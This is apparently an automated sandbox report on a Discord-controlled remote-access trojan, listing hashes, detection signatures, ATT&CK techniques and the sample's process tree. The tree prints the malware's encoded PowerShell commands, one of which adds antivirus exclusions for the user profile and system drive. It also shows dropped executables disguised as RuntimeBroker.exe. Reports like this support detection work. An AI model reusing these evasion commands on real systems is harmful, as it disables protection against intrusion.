discordrat | cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623

General

Target

cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe
Size

21.3MB
MD5

7aa4185295ab3f4f896704aed05c0795
SHA1

3ae4ec10990ff35a466328f1bc0e8ece616df3c3
SHA256

cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623
SHA512

997ffd6fae8e72b7ca5c62f7de9a9a2c487580b0fec589d305c485163ff873539baa20c5791c3626403cf824a02ebf458c24e28236eae45a75461d1ba88a9e45
SSDEEP

393216:jVymy1SvjN1GnU7s1/aRUFWYbyemyzgnfpyyxlj3OMddmZceVUJA9OhBI1Hs7:Em+SvZs+sldbzgRhFldmZceX9OP7

Score

10^/10

discordrat defense_evasion persistence pyinstaller rat rootkit stealer upx

Malware Config

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Executes dropped EXE 3 IoCs

pid	Process
2780	RuntimeBroker.exe
2140	RuntimeBroker2.0.exe
2568	RuntimeBroker.exe

Loads dropped DLL 11 IoCs

pid	Process
308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe
308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe
2780	RuntimeBroker.exe
2568	RuntimeBroker.exe
2828	WerFault.exe
2828	WerFault.exe
2828	WerFault.exe
2828	WerFault.exe
2828	WerFault.exe
1176	Process not Found
1176	Process not Found

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019c68-42.dat	upx
behavioral1/memory/2568-44-0x000007FEE9F40000-0x000007FEEA3A6000-memory.dmp	upx

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0010000000013423-18.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2460	powershell.exe
2840	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 308 wrote to memory of 2460	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	31
PID 308 wrote to memory of 2460	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	31
PID 308 wrote to memory of 2460	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	31
PID 308 wrote to memory of 2840	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	33
PID 308 wrote to memory of 2840	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	33
PID 308 wrote to memory of 2840	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	33
PID 308 wrote to memory of 2780	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	35
PID 308 wrote to memory of 2780	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	35
PID 308 wrote to memory of 2780	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	35
PID 308 wrote to memory of 2140	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	36
PID 308 wrote to memory of 2140	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	36
PID 308 wrote to memory of 2140	308	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe	36
PID 2780 wrote to memory of 2568	2780	RuntimeBroker.exe	37
PID 2780 wrote to memory of 2568	2780	RuntimeBroker.exe	37
PID 2780 wrote to memory of 2568	2780	RuntimeBroker.exe	37
PID 2140 wrote to memory of 2828	2140	RuntimeBroker2.0.exe	38
PID 2140 wrote to memory of 2828	2140	RuntimeBroker2.0.exe	38
PID 2140 wrote to memory of 2828	2140	RuntimeBroker2.0.exe	38

C:\Users\Admin\AppData\Local\Temp\cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe
"C:\Users\Admin\AppData\Local\Temp\cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2568
- C:\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe
  "C:\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2140 -s 596
    3⤵
    - Loads dropped DLL
    PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI27802\python310.dll

Filesize
1.4MB

MD5
4a6afa2200b1918c413d511c5a3c041c

SHA1
39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3

SHA256
bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da

SHA512
dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ce3840f1594580c9d314dd67259b8962

SHA1
98880d697508cb251204f2d8a1cb68e17324dd0f

SHA256
7787a05d82bd3e8cae599d2e66f384fbeaeb6bf44da0cc47ec7445f708da2ac4

SHA512
26e37f82f4b887f434149e4c617d87c66cd634887712aaefac3b9a8762ca6d0d0e5da1116d6184778520d240f079bcc06b681f68267e246ecaf986b155c966ad

Download Submit
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

Filesize
21.2MB

MD5
a83964f260c28614da067f6b3df9e044

SHA1
157304b579228e7d41e6218eac935339854bb431

SHA256
f5d2b5a19575e7b3041b846263316f66f80c2804f9e0f2376e1576612d27cca8

SHA512
dd4e8fa7fb45f091fd875eb347bb594ef7d890921255e2ba985e4f96a938b4997ce81f51a5951f3633d93c38e336e8fb4dc7eeec6545203076865ec6b0e232e1

Download Submit
\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe

Filesize
79KB

MD5
95af6e5d52a57515dc2e638c419f50d9

SHA1
d359abc0ebb9877c917e125fb4e28c24b27696a4

SHA256
0fe67abfd1a323e19a065a54d544f0997f5853f7a51a3526c10c1a15bf5b5749

SHA512
cfb2d075d75af7f965e961eccbf3f188e64a5b594e556a9bf8569f2c2380065fb2781e4e4689d87b7af65066cac217e59cf0a7d32f43f2bd61938aa06791b50b

Download Submit
memory/308-0-0x000007FEF59F3000-0x000007FEF59F4000-memory.dmp

Filesize
4KB

Download
memory/308-1-0x0000000000CD0000-0x000000000221E000-memory.dmp

Filesize
21.3MB

Download
memory/308-2-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

Filesize
9.9MB

Download
memory/308-36-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

Filesize
9.9MB

Download
memory/2140-32-0x000000013F250000-0x000000013F268000-memory.dmp

Filesize
96KB

Download
memory/2460-7-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2460-9-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2568-44-0x000007FEE9F40000-0x000007FEEA3A6000-memory.dmp

Filesize
4.4MB

Download

Analysis

Sharing